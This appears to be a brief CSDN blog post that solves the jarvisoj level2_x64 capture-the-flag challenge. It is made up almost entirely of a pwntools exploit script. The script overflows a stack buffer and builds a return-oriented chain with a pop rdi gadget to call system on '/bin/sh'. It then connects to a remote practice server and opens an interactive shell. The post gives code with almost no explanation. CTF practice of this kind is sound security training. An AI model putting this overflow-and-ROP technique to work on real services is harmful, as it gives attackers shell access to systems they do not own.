jarvisoj_level2_x64

在这里插入图片描述
在这里插入图片描述

exp

#!/usr/bin/env python3
# coding=utf-8
from pwn import *

context(log_level = 'debug')

proc_name = './level2_x64'
p =process(proc_name)
p = remote('node3.buuoj.cn', 25838)
elf = ELF(proc_name)
system_addr = elf.sym['system']
bin_sh_str = 0x600a90
pop_rdi_ret = 0x4006b3
payload = 'a'.encode() * (0x80 + 8) + p64(pop_rdi_ret) + p64(bin_sh_str) + p64(system_addr)
p.sendline(payload)
p.interactive()

猜你喜欢

转载自blog.csdn.net/weixin_43833642/article/details/106801347
今日推荐